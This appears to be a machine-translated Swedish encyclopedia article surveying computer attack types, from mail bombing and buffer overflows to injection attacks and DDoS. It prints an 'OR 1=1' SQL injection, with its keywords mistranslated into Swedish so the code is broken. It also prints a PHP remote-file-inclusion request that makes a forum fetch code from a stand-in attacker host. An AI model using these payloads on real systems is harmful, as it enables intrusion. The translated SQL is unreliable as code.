Hackerattack

Den aktuella versionen av sidan har ännu inte granskats av erfarna bidragsgivare och kan skilja sig väsentligt från versionen som granskades den 14 oktober 2017; kontroller kräver 20 redigeringar .

En hackerattack i ordets snäva bemärkelse - för närvarande förstås frasen som ett "angrepp på ett säkerhetssystem", och tenderar mer till innebörden av följande term Cracker attack . Detta berodde på en felaktig framställning av innebörden av själva ordet " hacker ".

En hackerattack i ordets vida bemärkelse (ursprunglig betydelse) är en brainstorming som syftar till att hitta sätt att lösa komplexa problem. En eller flera högklassiga specialister ( hackare ) kan delta i en hackerattack. Som ett resultat av brainstorming kan okonventionella metoder för att lösa ett problem uppfinnas eller optimeringsjusteringar göras av befintliga metoder.

En cracker- attack  är en åtgärd som syftar till att ta kontroll (höja rättigheter) över ett fjärr-/lokalt datorsystem, eller destabilisera det, eller denial of service.

Mailbombing ( SMTP )

Det anses vara den äldsta attackmetoden, även om dess kärna är enkel och primitiv: ett stort antal e-postmeddelanden gör det omöjligt att arbeta med postlådor, och ibland med hela e-postservrar . Många program har utvecklats för detta ändamål, och även en oerfaren användare kan utföra en attack genom att endast ange offrets e-post , meddelandetext och antalet meddelanden som behövs. Många sådana program gjorde det möjligt att dölja avsändarens riktiga IP-adress genom att använda en anonym e-postserver för utskick . Denna attack är svår att förhindra, eftersom inte ens ISP :s e-postfilter kan fastställa den verkliga skräppostavsändaren . Leverantören kan begränsa antalet e-postmeddelanden från en enskild avsändare, men avsändarens adress och ämne genereras ofta slumpmässigt .

Buffertspill

Kanske en av de vanligaste typerna av attacker på Internet. Principen för denna attack är baserad på användningen av programvarufel som gör det möjligt att orsaka minnesintrång och krascha applikationen eller exekvera godtycklig binär kod på uppdrag av användaren under vilken det sårbara programmet kördes. Om programmet körs under systemadministratörskontot kommer denna attack att tillåta dig att få full kontroll över offrets dator, så det rekommenderas att arbeta under kontot för en vanlig användare med begränsade rättigheter på systemet och endast utföra operationer som kräver administrativa rättigheter under systemadministratörskontot.

Virus , trojaner , maskar , sniffers , rootkits och andra specialprogram

Nästa typ av attack är en mer sofistikerad metod för att få tillgång till sekretessbelagd information - användningen av speciella program för att arbeta på offrets dator, såväl som vidare distribution (dessa är virus och maskar). Sådana program är utformade för att söka efter och överföra hemlig information till sin ägare, eller helt enkelt för att skada säkerhetssystemet och prestanda hos offrets dator. Funktionsprinciperna för dessa program är olika.

Nätverksintelligens

Under en sådan attack utför crackern faktiskt inga destruktiva handlingar, men som ett resultat kan den få konfidentiell information om konstruktionen och principerna för driften av offrets datorsystem. Den information som erhålls kan användas för att kompetent bygga den kommande attacken, och görs vanligtvis i de förberedande stadierna.

Under en sådan spaning kan en angripare utföra portskanning , DNS- frågor , pinga öppna portar, närvaron och säkerheten för proxyservrar . Som ett resultat kan du få information om de DNS-adresser som finns i systemet, vem som äger dem, vilka tjänster som finns tillgängliga på dem, nivån på åtkomst till dessa tjänster för externa och interna användare.

Packet sniffing

Det är också en ganska vanlig typ av attack baserad på driften av ett nätverkskort i promiskuöst läge , såväl som övervakningsläge för Wi-Fi-nätverk . I detta läge skickas alla paket som tas emot av nätverkskortet för bearbetning till en speciell applikation som kallas sniffer . Som ett resultat kan en angripare få en stor mängd tjänstinformation: vem, varifrån och var överförde paket, genom vilka adresser dessa paket passerade. Den största faran med en sådan attack är att få informationen själv, såsom inloggningar och lösenord för anställda, som kan användas för att illegalt komma in i systemet under täckmantel av en vanlig anställd på företaget.

IP-spoofing

Också en vanlig typ av attack i otillräckligt skyddade nätverk, när en angripare utger sig för att vara en auktoriserad användare, befinner sig i själva organisationen eller utanför den. För att göra detta måste crackern använda en IP-adress som är tillåten i nätverkssäkerhetssystemet. En sådan attack är möjlig om säkerhetssystemet tillåter användaridentifiering endast med IP-adress och inte kräver ytterligare bekräftelser.

Man-in-the-Middle

En typ av attack när en angripare fångar upp kommunikationskanalen mellan två system och får tillgång till all överförd information. När en angripare får åtkomst på denna nivå kan han modifiera informationen på det sätt han behöver för att nå sina mål. Syftet med en sådan attack är att olagligt erhålla, stjäla eller förfalska överförd information eller få obehörig åtkomst till nätverksresurser. Sådana attacker är extremt svåra att spåra, eftersom angriparen vanligtvis befinner sig inom organisationen.

Kodinjektion

En familj av attacker förenade av en gemensam princip - som ett resultat av attacken exekveras data som kod.

SQL-injektion  är en attack där parametrarna för SQL -frågor till databasen ändras. Som ett resultat får förfrågan en helt annan innebörd, och vid otillräcklig filtrering av indata kan den inte bara visa konfidentiell information, utan även ändra/radera data. Mycket ofta kan denna typ av attack observeras på exemplet med webbplatser som använder kommandoradsparametrar (i det här fallet URL- variabler ) för att bygga SQL-frågor till databaser utan korrekt validering [1] .

VÄLJ fältlista FRÅN tabell WHERE id = 23 ELLER 1=1;Istället för att kontrollera kan du ersätta ett påstående
som, om det är sant , gör att du kan kringgå kontrollen

PHP-injektion  är ett av sätten att hacka webbplatser som körs på PHP . Det består i att injicera ett speciellt utformat skadligt skript i webbapplikationskoden på serversidan av webbplatsen, vilket leder till exekvering av godtyckliga kommandon. Det är känt att många gratismotorer och forum som körs på PHP som är utbredda på Internet (oftast är dessa föråldrade versioner) har ogenomtänkta moduler eller separata strukturer med sårbarheter. Crackers analyserar sådana sårbarheter som oförrymda variabler som får externa värden. Till exempel, den gamla ExBB-forumssårbarheten utnyttjas av hackare med begäran: GET /modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt.

Cross Site Scripting eller XSS ( förkortning från engelska  Cross Site Scripting , inte att förväxla med CSS ( Cascade Style Sheet )) är en typ av sårbarheter som vanligtvis finns i webbapplikationer som tillåter skadliga användare att injicera kod på webbsidor som visas av andra användare . Exempel på sådan kod är HTML-kod och skript på klientsidan, oftast JavaScript .

XPath-injektion  är en typ av sårbarhet som involverar injicering av XPath- uttryck i den ursprungliga begäran till en XML- databas . Som med andra typer av injektioner är sårbarheten möjlig på grund av otillräcklig validering av indata.

Autofyll  är en webbinjektion som fungerar enligt principen om trojaner, vars huvudsakliga syfte är att infiltrera användarens konto i betalningssystemet , omärkligt ändra transaktionsdata genom att ändra HTML -koden och överföra användarens pengar till angriparens konto.

Social ingenjörskonst

Social ingenjörskonst (från engelska  social engineering ) - användning av inkompetens, inkompetens eller försumlighet av personal för att få tillgång till information. Denna metod används vanligtvis utan dator, med en vanlig telefon eller post. På så sätt erhålls vanligtvis en stor mängd information. I samband med en sådan attack etablerar angriparen kontakt med offret och försöker, genom att vilseleda eller få förtroende, få nödvändig information som är svår att få tag på på annat sätt, eller andra sätt är mer riskfyllda.

Denial of Service

DoS (från engelskan.  Denial of Service  - Denial of Service) - en attack som syftar till att få servern att inte svara på förfrågningar. Denna typ av attack innebär inte att man skaffar hemlig information, men ibland är det en hjälp för att initiera andra attacker. Till exempel kan vissa program, på grund av fel i deras kod, orsaka undantag och, när tjänster är inaktiverade, kan de köra kod som tillhandahålls av en angripare eller översvämningsattacker när servern inte kan behandla ett stort antal inkommande paket.

DDoS (från engelska  Distributed Denial of Service  - Distributed DoS) är en undertyp av DoS-attack som har samma mål som DoS, men som inte är gjord från en dator, utan från flera datorer i nätverket. Dessa typer av attacker använder antingen förekomsten av fel som leder till ett förnekande av tjänsten, eller drift av skydd, vilket leder till blockering av driften av tjänsten, och som ett resultat även till en överbelastning av tjänsten. DDoS används där vanlig DoS är ineffektiv. För att göra detta kombineras flera datorer, och var och en utför en DoS-attack på offrets system. Tillsammans kallas detta en DDoS-attack. Storleken på ett botnät kan variera från flera tiotals till flera hundra tusen datorer.

Varje attack är inget annat än ett försök att använda ofullkomligheten i offrets säkerhetssystem antingen för att få information eller för att skada systemet, därför är orsaken till varje framgångsrik attack knackarens professionalism och värdet av informationen, såväl som bristen på kompetens hos säkerhetssystemadministratören , i synnerhet den ofullkomliga programvaran och otillräcklig uppmärksamhet på säkerhetsfrågor i företaget som helhet.

Se även

Anteckningar

  1. SQL Injection Attacks by Example Arkiverad 7 november 2015 på Wayback Machine 

Länkar